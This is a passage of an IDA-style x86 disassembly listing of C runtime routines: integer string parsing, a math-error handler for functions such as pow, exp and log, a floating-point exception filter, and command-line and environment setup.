		jz	short loc_40AA4D
		cmp	[ebp+arg_C], 2
		jl	short loc_40AA10
		cmp	[ebp+arg_C], 24h
		jg	short loc_40AA10

loc_40AA4D:				; CODE XREF: sub_40A9EB+54j
		mov	ecx, [ebp+var_14]
		push	ebx
		mov	bl, [esi]
		mov	[ebp+var_4], edi
		lea	edi, [esi+1]

loc_40AA59:				; CODE XREF: sub_40A9EB+A5j
		cmp	dword ptr [ecx+0ACh], 1
		jle	short loc_40AA79
		lea	eax, [ebp+var_14]
		push	eax
		movzx	eax, bl
		push	8
		push	eax
		call	sub_40D004
		mov	ecx, [ebp+var_14]
		add	esp, 0Ch
		jmp	short loc_40AA89
; ---------------------------------------------------------------------------

loc_40AA79:				; CODE XREF: sub_40A9EB+75j
		mov	edx, [ecx+0C8h]
		movzx	eax, bl
		movzx	eax, byte ptr [edx+eax*2]
		and	eax, 8

loc_40AA89:				; CODE XREF: sub_40A9EB+8Cj
		test	eax, eax
		jz	short loc_40AA92
		mov	bl, [edi]
		inc	edi
		jmp	short loc_40AA59
; ---------------------------------------------------------------------------

loc_40AA92:				; CODE XREF: sub_40A9EB+A0j
		cmp	bl, 2Dh
		jnz	short loc_40AA9D
		or	[ebp+arg_10], 2
		jmp	short loc_40AAA2
; ---------------------------------------------------------------------------

loc_40AA9D:				; CODE XREF: sub_40A9EB+AAj
		cmp	bl, 2Bh
		jnz	short loc_40AAA5

loc_40AAA2:				; CODE XREF: sub_40A9EB+B0j
		mov	bl, [edi]
		inc	edi

loc_40AAA5:				; CODE XREF: sub_40A9EB+B5j
		mov	eax, [ebp+arg_C]
		test	eax, eax
		jl	loc_40ABF9
		cmp	eax, 1
		jz	loc_40ABF9
		cmp	eax, 24h
		jg	loc_40ABF9
		test	eax, eax
		jnz	short loc_40AAF0
		cmp	bl, 30h
		jz	short loc_40AAD4
		mov	[ebp+arg_C], 0Ah
		jmp	short loc_40AB08
; ---------------------------------------------------------------------------

loc_40AAD4:				; CODE XREF: sub_40A9EB+DEj
		mov	al, [edi]
		cmp	al, 78h
		jz	short loc_40AAE7
		cmp	al, 58h
		jz	short loc_40AAE7
		mov	[ebp+arg_C], 8
		jmp	short loc_40AB08
; ---------------------------------------------------------------------------

loc_40AAE7:				; CODE XREF: sub_40A9EB+EDj
					; sub_40A9EB+F1j
		mov	[ebp+arg_C], 10h
		jmp	short loc_40AAFA
; ---------------------------------------------------------------------------

loc_40AAF0:				; CODE XREF: sub_40A9EB+D9j
		cmp	eax, 10h
		jnz	short loc_40AB08
		cmp	bl, 30h
		jnz	short loc_40AB08

loc_40AAFA:				; CODE XREF: sub_40A9EB+103j
		mov	al, [edi]
		cmp	al, 78h
		jz	short loc_40AB04
		cmp	al, 58h
		jnz	short loc_40AB08

loc_40AB04:				; CODE XREF: sub_40A9EB+113j
		inc	edi
		mov	bl, [edi]
		inc	edi

loc_40AB08:				; CODE XREF: sub_40A9EB+E7j
					; sub_40A9EB+FAj ...
		mov	esi, [ecx+0C8h]
		or	eax, 0FFFFFFFFh
		xor	edx, edx
		div	[ebp+arg_C]

loc_40AB16:				; CODE XREF: sub_40A9EB+19Dj
		movzx	ecx, bl
		movzx	ecx, word ptr [esi+ecx*2]
		test	cl, 4
		jz	short loc_40AB2A
		movsx	ecx, bl
		sub	ecx, 30h
		jmp	short loc_40AB44
; ---------------------------------------------------------------------------

loc_40AB2A:				; CODE XREF: sub_40A9EB+135j
		test	cx, 103h
		jz	short loc_40AB62
		mov	cl, bl
		sub	cl, 61h
		cmp	cl, 19h
		movsx	ecx, bl
		ja	short loc_40AB41
		sub	ecx, 20h

loc_40AB41:				; CODE XREF: sub_40A9EB+151j
		add	ecx, 0FFFFFFC9h

loc_40AB44:				; CODE XREF: sub_40A9EB+13Dj
		cmp	ecx, [ebp+arg_C]
		jnb	short loc_40AB62
		or	[ebp+arg_10], 8
		cmp	[ebp+var_4], eax
		jb	short loc_40AB79
		jnz	short loc_40AB58
		cmp	ecx, edx
		jbe	short loc_40AB79

loc_40AB58:				; CODE XREF: sub_40A9EB+167j
		or	[ebp+arg_10], 4
		cmp	[ebp+arg_8], 0
		jnz	short loc_40AB85

loc_40AB62:				; CODE XREF: sub_40A9EB+144j
					; sub_40A9EB+15Cj
		mov	eax, [ebp+arg_10]
		dec	edi
		test	al, 8
		jnz	short loc_40AB8A
		cmp	[ebp+arg_8], 0
		jz	short loc_40AB73
		mov	edi, [ebp+arg_4]

loc_40AB73:				; CODE XREF: sub_40A9EB+183j
		and	[ebp+var_4], 0
		jmp	short loc_40ABD5
; ---------------------------------------------------------------------------

loc_40AB79:				; CODE XREF: sub_40A9EB+165j
					; sub_40A9EB+16Bj
		mov	ebx, [ebp+var_4]
		imul	ebx, [ebp+arg_C]
		add	ebx, ecx
		mov	[ebp+var_4], ebx

loc_40AB85:				; CODE XREF: sub_40A9EB+175j
		mov	bl, [edi]
		inc	edi
		jmp	short loc_40AB16
; ---------------------------------------------------------------------------

loc_40AB8A:				; CODE XREF: sub_40A9EB+17Dj
		test	al, 4
		mov	esi, 7FFFFFFFh
		jnz	short loc_40ABAE
		test	al, 1
		jnz	short loc_40ABD5
		and	eax, 2
		jz	short loc_40ABA5
		cmp	[ebp+var_4], 80000000h
		ja	short loc_40ABAE

loc_40ABA5:				; CODE XREF: sub_40A9EB+1AFj
		test	eax, eax
		jnz	short loc_40ABD5
		cmp	[ebp+var_4], esi
		jbe	short loc_40ABD5

loc_40ABAE:				; CODE XREF: sub_40A9EB+1A6j
					; sub_40A9EB+1B8j
		call	sub_405D93
		test	byte ptr [ebp+arg_10], 1
		mov	dword ptr [eax], 22h
		jz	short loc_40ABC5
		or	[ebp+var_4], 0FFFFFFFFh
		jmp	short loc_40ABD5
; ---------------------------------------------------------------------------

loc_40ABC5:				; CODE XREF: sub_40A9EB+1D2j
		mov	al, byte ptr [ebp+arg_10]
		and	al, 2
		neg	al
		sbb	eax, eax
		neg	eax
		add	eax, esi
		mov	[ebp+var_4], eax

loc_40ABD5:				; CODE XREF: sub_40A9EB+18Cj
					; sub_40A9EB+1AAj ...
		mov	eax, [ebp+arg_8]
		test	eax, eax
		jz	short loc_40ABDE
		mov	[eax], edi

loc_40ABDE:				; CODE XREF: sub_40A9EB+1EFj
		test	byte ptr [ebp+arg_10], 2
		jz	short loc_40ABE7
		neg	[ebp+var_4]

loc_40ABE7:				; CODE XREF: sub_40A9EB+1F7j
		cmp	[ebp+var_8], 0
		jz	short loc_40ABF4
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40ABF4:				; CODE XREF: sub_40A9EB+200j
		mov	eax, [ebp+var_4]
		jmp	short loc_40AC11
; ---------------------------------------------------------------------------

loc_40ABF9:				; CODE XREF: sub_40A9EB+BFj
					; sub_40A9EB+C8j ...
		mov	eax, [ebp+arg_8]
		test	eax, eax
		jz	short loc_40AC02
		mov	[eax], esi

loc_40AC02:				; CODE XREF: sub_40A9EB+213j
		cmp	[ebp+var_8], 0
		jz	short loc_40AC0F
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40AC0F:				; CODE XREF: sub_40A9EB+21Bj
		xor	eax, eax

loc_40AC11:				; CODE XREF: sub_40A9EB+20Cj
		pop	ebx

loc_40AC12:				; CODE XREF: sub_40A9EB+4Cj
		pop	edi
		pop	esi
		leave
		retn
sub_40A9EB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40AC16	proc near		; CODE XREF: sub_404365+8p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		xor	eax, eax
		cmp	dword_428140, eax
		push	eax
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		jnz	short loc_40AC34
		push	offset off_424680
		jmp	short loc_40AC35
; ---------------------------------------------------------------------------

loc_40AC34:				; CODE XREF: sub_40AC16+15j
		push	eax

loc_40AC35:				; CODE XREF: sub_40AC16+1Cj
		call	sub_40A9EB
		add	esp, 14h
		pop	ebp
		retn
sub_40AC16	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40AC3F	proc near		; CODE XREF: sub_404380+B5p

var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= qword	ptr -20h
var_18		= qword	ptr -18h
var_10		= qword	ptr -10h
var_8		= qword	ptr -8
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		xor	eax, eax
		cmp	dword_428650, eax
		push	ebx
		mov	ebx, [ebp+arg_4]
		push	esi
		mov	esi, [ebp+arg_8]
		push	edi
		mov	edi, [ebp+arg_0]
		mov	byte ptr [ebp+var_8], al
		mov	byte ptr [ebp+var_8+1],	al
		mov	byte ptr [ebp+var_8+2],	al
		mov	byte ptr [ebp+var_8+3],	al
		mov	byte ptr [ebp+var_8+4],	al
		mov	byte ptr [ebp+var_8+5],	al
		mov	byte ptr [ebp+var_8+6],	al
		mov	byte ptr [ebp+var_8+7],	al
		jz	short loc_40AC81
		push	dword_4376E0
		call	sub_405753
		pop	ecx
		jmp	short loc_40AC86
; ---------------------------------------------------------------------------

loc_40AC81:				; CODE XREF: sub_40AC3F+32j
		mov	eax, offset sub_40FCC8

loc_40AC86:				; CODE XREF: sub_40AC3F+40j
		mov	ecx, [ebp+arg_C]
		mov	edx, 0A6h
		cmp	ecx, edx
		jg	loc_40AE0A
		jz	loc_40ADF7
		cmp	ecx, 19h
		jg	loc_40AD9D
		jz	loc_40AD94
		mov	edx, ecx
		push	2
		pop	ecx
		sub	edx, ecx
		jz	loc_40AD85
		dec	edx
		jz	loc_40AD7C
		sub	edx, 5
		jz	loc_40AD6D
		dec	edx
		jz	loc_40AD55
		sub	edx, 5
		jz	short loc_40AD45
		dec	edx
		jz	short loc_40AD1C
		sub	edx, 9
		jnz	loc_40AEB4	; default
		mov	[ebp+var_28], 3

loc_40ACE7:				; CODE XREF: sub_40AC3F+1ACj
		mov	[ebp+var_24], offset aPow ; "pow"

loc_40ACEE:				; CODE XREF: sub_40AC3F+114j
					; sub_40AC3F+138j ...
		fld	qword ptr [edi]
		lea	ecx, [ebp+var_28]
		fstp	[ebp+var_20]
		push	ecx
		fld	qword ptr [ebx]
		fstp	[ebp+var_18]
		fld	qword ptr [esi]
		fstp	[ebp+var_10]
		call	eax
		test	eax, eax
		pop	ecx
		jnz	loc_40AEAF
		call	sub_405D93
		mov	dword ptr [eax], 22h
		jmp	loc_40AEAF
; ---------------------------------------------------------------------------

loc_40AD1C:				; CODE XREF: sub_40AC3F+96j
		mov	[ebp+var_24], offset aExp ; "exp"

loc_40AD23:				; CODE XREF: sub_40AC3F+15Cj
		fld	qword ptr [edi]
		lea	ecx, [ebp+var_28]
		fstp	[ebp+var_20]
		push	ecx
		fld	qword ptr [ebx]
		mov	[ebp+var_28], 4
		fstp	[ebp+var_18]
		fld	qword ptr [esi]
		fstp	[ebp+var_10]
		call	eax
		pop	ecx
		jmp	loc_40AEAF
; ---------------------------------------------------------------------------

loc_40AD45:				; CODE XREF: sub_40AC3F+93j
		mov	[ebp+var_28], 3
		mov	[ebp+var_24], offset aExp ; "exp"
		jmp	short loc_40ACEE
; ---------------------------------------------------------------------------

loc_40AD55:				; CODE XREF: sub_40AC3F+8Aj
		mov	[ebp+var_24], offset aLog10 ; "log10"

loc_40AD5C:				; CODE XREF: sub_40AC3F+144j
					; sub_40AC3F+181j ...
		fld	qword ptr [edi]
		fstp	[ebp+var_20]
		fld	qword ptr [ebx]
		fstp	[ebp+var_18]
		fld	qword ptr [esi]
		jmp	loc_40AE8F
; ---------------------------------------------------------------------------

loc_40AD6D:				; CODE XREF: sub_40AC3F+83j
		mov	[ebp+var_28], ecx
		mov	[ebp+var_24], offset aLog10 ; "log10"
		jmp	loc_40ACEE
; ---------------------------------------------------------------------------

loc_40AD7C:				; CODE XREF: sub_40AC3F+7Aj
		mov	[ebp+var_24], offset aLog ; "log"
		jmp	short loc_40AD5C
; ---------------------------------------------------------------------------

loc_40AD85:				; CODE XREF: sub_40AC3F+73j
		mov	[ebp+var_28], ecx
		mov	[ebp+var_24], offset aLog ; "log"
		jmp	loc_40ACEE
; ---------------------------------------------------------------------------

loc_40AD94:				; CODE XREF: sub_40AC3F+66j
		mov	[ebp+var_24], offset aPow ; "pow"
		jmp	short loc_40AD23
; ---------------------------------------------------------------------------

loc_40AD9D:				; CODE XREF: sub_40AC3F+60j
		sub	ecx, 1Ah
		jz	short loc_40ADF0
		dec	ecx
		jz	short loc_40ADE4
		dec	ecx
		jz	short loc_40ADD8 ; jumptable 0040AE19 case 1006
		dec	ecx
		jz	short loc_40ADCB
		sub	ecx, 1Dh
		jz	short loc_40ADC2 ; jumptable 0040AE19 case 1008
		sub	ecx, 3
		jnz	loc_40AEB4	; default

loc_40ADB9:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aAsin ; jumptable 0040AE19	case 1009
		jmp	short loc_40AD5C
; ---------------------------------------------------------------------------

loc_40ADC2:				; CODE XREF: sub_40AC3F+16Fj
					; sub_40AC3F+1DAj
					; DATA XREF: ...
		mov	[ebp+var_24], offset aAcos ; jumptable 0040AE19	case 1008
		jmp	short loc_40AD5C
; ---------------------------------------------------------------------------

loc_40ADCB:				; CODE XREF: sub_40AC3F+16Aj
		mov	[ebp+var_24], offset aPow ; "pow"

loc_40ADD2:				; CODE XREF: sub_40AC3F+1E8j
					; sub_40AC3F+1F1j ...
		fld	qword ptr [edi]
		fstp	qword ptr [esi]
		jmp	short loc_40AD5C
; ---------------------------------------------------------------------------

loc_40ADD8:				; CODE XREF: sub_40AC3F+167j
					; sub_40AC3F+1DAj
					; DATA XREF: ...
		mov	[ebp+var_24], offset aPow ; jumptable 0040AE19 case 1006
		jmp	loc_40AD5C
; ---------------------------------------------------------------------------

loc_40ADE4:				; CODE XREF: sub_40AC3F+164j
		mov	[ebp+var_28], 2
		jmp	loc_40ACE7
; ---------------------------------------------------------------------------

loc_40ADF0:				; CODE XREF: sub_40AC3F+161j
		fld1
		jmp	loc_40AEB2
; ---------------------------------------------------------------------------

loc_40ADF7:				; CODE XREF: sub_40AC3F+57j
		mov	[ebp+var_28], 3
		mov	[ebp+var_24], offset aExp10 ; "exp10"
		jmp	loc_40ACEE
; ---------------------------------------------------------------------------

loc_40AE0A:				; CODE XREF: sub_40AC3F+51j
		add	ecx, 0FFFFFC18h	; switch 13 cases
		cmp	ecx, 0Ch
		ja	loc_40AEB4	; default
		jmp	ds:off_40AEBB[ecx*4] ; switch jump

loc_40AE20:				; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aLog ; jumptable 0040AE19 case 1000
		jmp	short loc_40ADD2
; ---------------------------------------------------------------------------

loc_40AE29:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aLog10 ; jumptable	0040AE19 case 1001
		jmp	short loc_40ADD2
; ---------------------------------------------------------------------------

loc_40AE32:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aExp ; jumptable 0040AE19 case 1002
		jmp	short loc_40ADD2
; ---------------------------------------------------------------------------

loc_40AE3B:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aAtan ; jumptable 0040AE19	case 1003
		jmp	short loc_40ADD2
; ---------------------------------------------------------------------------

loc_40AE44:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aCeil ; jumptable 0040AE19	case 1004
		jmp	short loc_40ADD2
; ---------------------------------------------------------------------------

loc_40AE4D:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aFloor ; jumptable	0040AE19 case 1005
		jmp	loc_40ADD2
; ---------------------------------------------------------------------------

loc_40AE59:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aModf ; jumptable 0040AE19	case 1007
		jmp	loc_40ADD2
; ---------------------------------------------------------------------------

loc_40AE65:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset dword_41EBE0 ; jumptable 0040AE19 case 1010
		jmp	short loc_40AE7E
; ---------------------------------------------------------------------------

loc_40AE6E:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset dword_41EBDC ; jumptable 0040AE19 case 1011
		jmp	short loc_40AE7E
; ---------------------------------------------------------------------------

loc_40AE77:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset dword_41EBD8 ; jumptable 0040AE19 case 1012

loc_40AE7E:				; CODE XREF: sub_40AC3F+22Dj
					; sub_40AC3F+236j
		fld	qword ptr [edi]
		fmul	[ebp+var_8]
		fst	qword ptr [esi]
		fld	qword ptr [edi]
		fstp	[ebp+var_20]
		fld	qword ptr [ebx]
		fstp	[ebp+var_18]

loc_40AE8F:				; CODE XREF: sub_40AC3F+129j
		lea	ecx, [ebp+var_28]
		fstp	[ebp+var_10]
		push	ecx
		mov	[ebp+var_28], 1
		call	eax
		test	eax, eax
		pop	ecx
		jnz	short loc_40AEAF
		call	sub_405D93
		mov	dword ptr [eax], 21h

loc_40AEAF:				; CODE XREF: sub_40AC3F+C7j
					; sub_40AC3F+D8j ...
		fld	[ebp+var_10]

loc_40AEB2:				; CODE XREF: sub_40AC3F+1B3j
		fstp	qword ptr [esi]

loc_40AEB4:				; CODE XREF: sub_40AC3F+9Bj
					; sub_40AC3F+174j ...
		pop	edi		; default
		pop	esi
		pop	ebx
		leave
		retn
sub_40AC3F	endp

; ---------------------------------------------------------------------------
		db 8Bh,	0FFh
off_40AEBB	dd offset loc_40AE20	; DATA XREF: sub_40AC3F+1DAr
		dd offset loc_40AE29	; jump table for switch	statement
		dd offset loc_40AE32
		dd offset loc_40AE3B
		dd offset loc_40AE44
		dd offset loc_40AE4D
		dd offset loc_40ADD8
		dd offset loc_40AE59
		dd offset loc_40ADC2
		dd offset loc_40ADB9
		dd offset loc_40AE65
		dd offset loc_40AE6E
		dd offset loc_40AE77

; =============== S U B	R O U T	I N E =======================================



sub_40AEEF	proc near		; DATA XREF: jlrllt49:0041E2ECo
		and	dword_4376D8, 0
		call	sub_40FD99
		mov	dword_4376D8, eax
		xor	eax, eax
		retn
sub_40AEEF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_40AF03(double)

sub_40AF03	proc near		; CODE XREF: sub_404380+7j
					; sub_404380+38j

var_24		= qword	ptr -24h
var_18		= qword	ptr -18h
var_8		= qword	ptr -8
arg_0		= qword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	ebx
		push	esi
		mov	esi, 0FFFFh
		push	esi
		push	dword_424DB8
		call	sub_41061D
		fld	[ebp+arg_0]
		pop	ecx
		pop	ecx
		mov	ebx, eax
		mov	eax, dword ptr [ebp+arg_0+6]
		push	ecx
		and	ax, 7FF0h
		cmp	ax, 7FF0h
		push	ecx
		fstp	[esp+18h+var_18]
		jnz	short loc_40AF89
		call	sub_4104FC
		test	eax, eax
		pop	ecx
		pop	ecx
		jle	short loc_40AF6C
		cmp	eax, 2
		jle	short loc_40AF5E
		cmp	eax, 3
		jnz	short loc_40AF6C
		fld	[ebp+arg_0]
		push	ebx		; int
		push	ecx
		push	ecx		; double
		fstp	qword ptr [esp]
		push	0Ch		; int
		call	sub_4103B4
		add	esp, 10h
		jmp	short loc_40AFD0
; ---------------------------------------------------------------------------

loc_40AF5E:				; CODE XREF: sub_40AF03+3Fj
		push	esi
		push	ebx
		call	sub_41061D
		fld	[ebp+arg_0]
		pop	ecx
		pop	ecx
		jmp	short loc_40AFD0
; ---------------------------------------------------------------------------

loc_40AF6C:				; CODE XREF: sub_40AF03+3Aj
					; sub_40AF03+44j
		fld	[ebp+arg_0]
		push	ebx
		fadd	ds:dbl_41EC10
		sub	esp, 10h
		fstp	qword ptr [esp+8]
		fld	[ebp+arg_0]
		fstp	[esp+24h+var_24]
		push	0Ch
		push	8
		jmp	short loc_40AFC8
; ---------------------------------------------------------------------------

loc_40AF89:				; CODE XREF: sub_40AF03+2Fj
		call	sub_4104C1
		fstp	[ebp+var_8]
		fld	[ebp+arg_0]
		pop	ecx
		fcomp	[ebp+var_8]
		pop	ecx
		fnstsw	ax
		test	ah, 44h
		jp	short loc_40AFAE

loc_40AFA0:				; CODE XREF: sub_40AF03+AEj
		push	esi
		push	ebx
		call	sub_41061D
		fld	[ebp+var_8]
		pop	ecx
		pop	ecx
		jmp	short loc_40AFD0
; ---------------------------------------------------------------------------

loc_40AFAE:				; CODE XREF: sub_40AF03+9Bj
		test	bl, 20h
		jnz	short loc_40AFA0
		fld	[ebp+var_8]
		push	ebx		; int
		sub	esp, 10h
		fstp	qword ptr [esp+8]
		fld	[ebp+arg_0]
		fstp	[esp+24h+var_24]
		push	0Ch		; int
		push	10h		; int

loc_40AFC8:				; CODE XREF: sub_40AF03+84j
		call	sub_410407
		add	esp, 1Ch

loc_40AFD0:				; CODE XREF: sub_40AF03+59j
					; sub_40AF03+67j ...
		pop	esi
		pop	ebx
		leave
		retn
sub_40AF03	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_445. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40AFD5	proc near		; CODE XREF: .text:0040469Bp

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	esi
		call	sub_4058DA
		mov	esi, eax
		test	esi, esi
		jnz	short loc_40AFF4
		push	[ebp+arg_4]
		call	ds:off_41E198
		jmp	loc_40B141
; ---------------------------------------------------------------------------

loc_40AFF4:				; CODE XREF: sub_40AFD5+Fj
		mov	edx, [esi+5Ch]
		mov	eax, dword_424E44
		push	edi
		mov	edi, [ebp+arg_0]
		mov	ecx, edx
		push	ebx

loc_40B003:				; CODE XREF: sub_40AFD5+3Ej
		cmp	[ecx], edi
		jz	short loc_40B015
		mov	ebx, eax
		imul	ebx, 0Ch
		add	ecx, 0Ch
		add	ebx, edx
		cmp	ecx, ebx
		jb	short loc_40B003

loc_40B015:				; CODE XREF: sub_40AFD5+30j
		imul	eax, 0Ch
		add	eax, edx
		cmp	ecx, eax
		jnb	short loc_40B026
		cmp	[ecx], edi
		jnz	short loc_40B026
		mov	eax, ecx
		jmp	short loc_40B028
; ---------------------------------------------------------------------------

loc_40B026:				; CODE XREF: sub_40AFD5+47j
					; sub_40AFD5+4Bj
		xor	eax, eax

loc_40B028:				; CODE XREF: sub_40AFD5+4Fj
		test	eax, eax
		jz	short loc_40B036
		mov	ebx, [eax+8]
		test	ebx, ebx
		mov	[ebp+var_4], ebx
		jnz	short loc_40B044

loc_40B036:				; CODE XREF: sub_40AFD5+55j
		push	[ebp+arg_4]
		call	ds:off_41E198
		jmp	loc_40B13F
; ---------------------------------------------------------------------------

loc_40B044:				; CODE XREF: sub_40AFD5+5Fj
		cmp	ebx, 5
		jnz	short loc_40B055
		and	dword ptr [eax+8], 0
		xor	eax, eax
		inc	eax
		jmp	loc_40B13F
; ---------------------------------------------------------------------------

loc_40B055:				; CODE XREF: sub_40AFD5+72j
		cmp	ebx, 1
		jz	loc_40B13C
		mov	ecx, [esi+60h]
		mov	[ebp+var_8], ecx
		mov	ecx, [ebp+arg_4]
		mov	[esi+60h], ecx
		mov	ecx, [eax+4]
		cmp	ecx, 8
		jnz	loc_40B12E
		mov	ecx, dword_424E38
		mov	edi, dword_424E3C
		mov	edx, ecx
		add	edi, ecx
		cmp	edx, edi
		jge	short loc_40B0AE
		imul	ecx, 0Ch

loc_40B08D:				; CODE XREF: sub_40AFD5+D4j
		mov	edi, [esi+5Ch]
		and	dword ptr [ecx+edi+8], 0
		mov	edi, dword_424E38
		mov	ebx, dword_424E3C
		inc	edx
		add	ebx, edi
		add	ecx, 0Ch
		cmp	edx, ebx
		jl	short loc_40B08D
		mov	ebx, [ebp+var_4]

loc_40B0AE:				; CODE XREF: sub_40AFD5+B3j
		mov	eax, [eax]
		cmp	eax, 0C000008Eh
		mov	edi, [esi+64h]
		jnz	short loc_40B0C3
		mov	dword ptr [esi+64h], 83h
		jmp	short loc_40B121
; ---------------------------------------------------------------------------

loc_40B0C3:				; CODE XREF: sub_40AFD5+E3j
		cmp	eax, 0C0000090h
		jnz	short loc_40B0D3
		mov	dword ptr [esi+64h], 81h
		jmp	short loc_40B121
; ---------------------------------------------------------------------------

loc_40B0D3:				; CODE XREF: sub_40AFD5+F3j
		cmp	eax, 0C0000091h
		jnz	short loc_40B0E3
		mov	dword ptr [esi+64h], 84h
		jmp	short loc_40B121
; ---------------------------------------------------------------------------

loc_40B0E3:				; CODE XREF: sub_40AFD5+103j
		cmp	eax, 0C0000093h
		jnz	short loc_40B0F3
		mov	dword ptr [esi+64h], 85h
		jmp	short loc_40B121
; ---------------------------------------------------------------------------

loc_40B0F3:				; CODE XREF: sub_40AFD5+113j
		cmp	eax, 0C000008Dh
		jnz	short loc_40B103
		mov	dword ptr [esi+64h], 82h
		jmp	short loc_40B121
; ---------------------------------------------------------------------------

loc_40B103:				; CODE XREF: sub_40AFD5+123j
		cmp	eax, 0C000008Fh
		jnz	short loc_40B113
		mov	dword ptr [esi+64h], 86h
		jmp	short loc_40B121
; ---------------------------------------------------------------------------

loc_40B113:				; CODE XREF: sub_40AFD5+133j
		cmp	eax, 0C0000092h
		jnz	short loc_40B121
		mov	dword ptr [esi+64h], 8Ah

loc_40B121:				; CODE XREF: sub_40AFD5+ECj
					; sub_40AFD5+FCj ...
		push	dword ptr [esi+64h]
		push	8
		call	ebx
		pop	ecx
		mov	[esi+64h], edi
		jmp	short loc_40B135
; ---------------------------------------------------------------------------

loc_40B12E:				; CODE XREF: sub_40AFD5+9Bj
		and	dword ptr [eax+8], 0
		push	ecx
		call	ebx

loc_40B135:				; CODE XREF: sub_40AFD5+157j
		mov	eax, [ebp+var_8]
		pop	ecx
		mov	[esi+60h], eax

loc_40B13C:				; CODE XREF: sub_40AFD5+83j
		or	eax, 0FFFFFFFFh

loc_40B13F:				; CODE XREF: sub_40AFD5+6Aj
					; sub_40AFD5+7Bj
		pop	ebx
		pop	edi

loc_40B141:				; CODE XREF: sub_40AFD5+1Aj
		pop	esi
		leave
		retn
sub_40AFD5	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B144	proc near		; CODE XREF: .text:loc_404658p
		push	esi
		push	edi
		xor	edi, edi
		cmp	dword_438834, edi
		jnz	short loc_40B155
		call	sub_4053C3

loc_40B155:				; CODE XREF: sub_40B144+Aj
		mov	esi, dword_438858
		test	esi, esi
		jnz	short loc_40B164
		mov	esi, offset word_41E4A2

loc_40B164:				; CODE XREF: sub_40B144+19j
					; sub_40B144+4Bj
		mov	al, [esi]
		cmp	al, 20h
		ja	short loc_40B172
		test	al, al
		jz	short loc_40B19C
		test	edi, edi
		jz	short loc_40B196

loc_40B172:				; CODE XREF: sub_40B144+24j
		cmp	al, 22h
		jnz	short loc_40B17F
		xor	ecx, ecx
		test	edi, edi
		setz	cl
		mov	edi, ecx

loc_40B17F:				; CODE XREF: sub_40B144+30j
		movzx	eax, al
		push	eax
		call	sub_41075D
		test	eax, eax
		pop	ecx
		jz	short loc_40B18E
		inc	esi

loc_40B18E:				; CODE XREF: sub_40B144+47j
		inc	esi
		jmp	short loc_40B164
; ---------------------------------------------------------------------------

loc_40B191:				; CODE XREF: sub_40B144+56j
		cmp	al, 20h
		ja	short loc_40B19C
		inc	esi

loc_40B196:				; CODE XREF: sub_40B144+2Cj
		mov	al, [esi]
		test	al, al
		jnz	short loc_40B191

loc_40B19C:				; CODE XREF: sub_40B144+28j
					; sub_40B144+4Fj
		pop	edi
		mov	eax, esi
		pop	esi
		retn
sub_40B144	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B1A1	proc near		; CODE XREF: .text:loc_404635p
		push	ebx
		xor	ebx, ebx
		cmp	dword_438834, ebx
		push	esi
		push	edi
		jnz	short loc_40B1B3
		call	sub_4053C3

loc_40B1B3:				; CODE XREF: sub_40B1A1+Bj
		mov	esi, dword_427DF4
		xor	edi, edi
		cmp	esi, ebx
		jnz	short loc_40B1D7

loc_40B1BF:				; CODE XREF: sub_40B1A1+51j
		or	eax, 0FFFFFFFFh
		jmp	loc_40B262
; ---------------------------------------------------------------------------

loc_40B1C7:				; CODE XREF: sub_40B1A1+3Aj
		cmp	al, 3Dh
		jz	short loc_40B1CC
		inc	edi

loc_40B1CC:				; CODE XREF: sub_40B1A1+28j
		push	esi
		call	sub_4046F0
		pop	ecx
		lea	esi, [esi+eax+1]

loc_40B1D7:				; CODE XREF: sub_40B1A1+1Cj
		mov	al, [esi]
		cmp	al, bl
		jnz	short loc_40B1C7
		push	4
		inc	edi
		push	edi
		call	sub_407D3A
		mov	edi, eax
		cmp	edi, ebx
		pop	ecx
		pop	ecx
		mov	dword_4282F8, edi
		jz	short loc_40B1BF
		mov	esi, dword_427DF4
		push	ebp
		jmp	short loc_40B23D
; ---------------------------------------------------------------------------

loc_40B1FD:				; CODE XREF: sub_40B1A1+9Ej
		push	esi
